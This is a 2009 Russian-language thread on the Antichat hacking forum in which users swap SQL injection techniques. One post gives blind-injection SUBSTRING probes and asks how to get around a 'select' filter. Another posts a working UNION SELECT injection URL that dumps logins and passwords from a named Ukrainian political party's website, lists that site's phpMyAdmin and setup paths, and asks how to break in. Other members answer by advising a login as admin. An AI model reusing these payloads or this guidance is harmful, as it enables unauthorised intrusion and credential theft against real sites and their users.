ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.10.2009, 16:20
|
|
Banned
Регистрация: 15.08.2009
Сообщений: 12
Провел на форуме:
113728
Репутация:
28
|
|
Сообщение от Rezak
Есть такой скрипт
PHP код:
<?php
session_start();
$template->set_filenames(array('head'=>"$template_path/header.html"));
$template->pparse('head');
?>
Реально череp параметры переопределить класс template, ну и заставить скрипт делать что-то свое? нет
|
|
|
16.10.2009, 17:28
|
|
Постоянный
Регистрация: 07.03.2009
Сообщений: 357
Провел на форуме:
1284900
Репутация:
399
|
|
Есть страница со слепой скулей.
При вводе
Код:
?id=1+AND+(SUBSTRING(version(),1,1 ))>33..127
всё работает нормально.
При вводе
Код:
?id=1+AND+(SUBSTRING((select+login+from+users+limit+1,1),1,1 ))>33..127
Тишина.(таблица и поля 100% называться так)
Для проверки ввёл
Код:
?id=1+AND+(SUBSTRING((select+select+version()),1,1 ))>33..127
Всё вывелось.
Т.е. в коде видимо идёт замена 'select' на '', для пробы попробовал selselectct, тоже не помогло(видимо проверка в цикле), можно тут что-то сделать?
Последний раз редактировалось Gray_Wolf; 16.10.2009 в 17:43..
|
|
|
|
16.10.2009, 17:31
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Gray_Wolf
можно тут что-то сделать?
Дать линк
|
|
|
|
16.10.2009, 17:31
|
|
Постоянный
Регистрация: 07.03.2009
Сообщений: 357
Провел на форуме:
1284900
Репутация:
399
|
|
Сообщение от jokester
Дать линк
сайт недоступен из инета 
|
|
|
|
16.10.2009, 17:36
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Gray_Wolf
При вводе
Код:
?id=1+AND+(SUBSTRING((select+login.users+limit(1,1)),1,1 ))>33..127
Тишина.(таблица и поля 100% называться так) WTF?
|
|
|
|
16.10.2009, 17:51
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
Такая ситуация.
Есть сайт одной украинской партии.
Есть скуля по нему
Код:
http://www.prp.org.ua/index.php?mid=10&action=news_full&news_id=-1229%20union%20select%201,login,3,password,5,6,7,8,9,10,11,12,13%20FROM%20private%20--
есть админка
Код:
http://www.prp.org.ua/phpmyadmin
есть ещё конфиг к ней, но я не знаю что с ней делать
Код:
http://www.prp.org.ua/phpmyadmin/scripts/setup.php
Вот ещё сдесь директ админ
Код:
http://www.prp.org.ua/config
помогите...пароли не подходят, и что можно со всем этим сделать |
|
|
|
16.10.2009, 18:04
|
|
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме:
879928
Репутация:
438
|
|
phpmyadmin это оболчка для работы с базами данных mysql, а не админка
а вход на главной ))
|
|
|
|
16.10.2009, 18:05
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
TELO, ты достаешь данные не из конфига MySQL / DirectAdmin'a.
|
|
|
|
16.10.2009, 18:22
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
Сообщение от mailbrush
TELO, ты достаешь данные не из конфига MySQL / DirectAdmin'a.
а можно подробнее?
|
|
|
|
16.10.2009, 19:34
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от TELO
а можно подробнее?
Т.е. ты достаешь данные из таблички пользователей сайта. А путь ты нашёл не к админке сайта, а к phpmyadmin'у и directadmin'y, соответственно пароль не подходит. Авторизация, как было сказано выше, на главной странице. Авторизируйся под логином и паролем admin.
|
|
|
|
|
|
|
|
Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
|
|
|
|
Похожие темы
Линейный вид
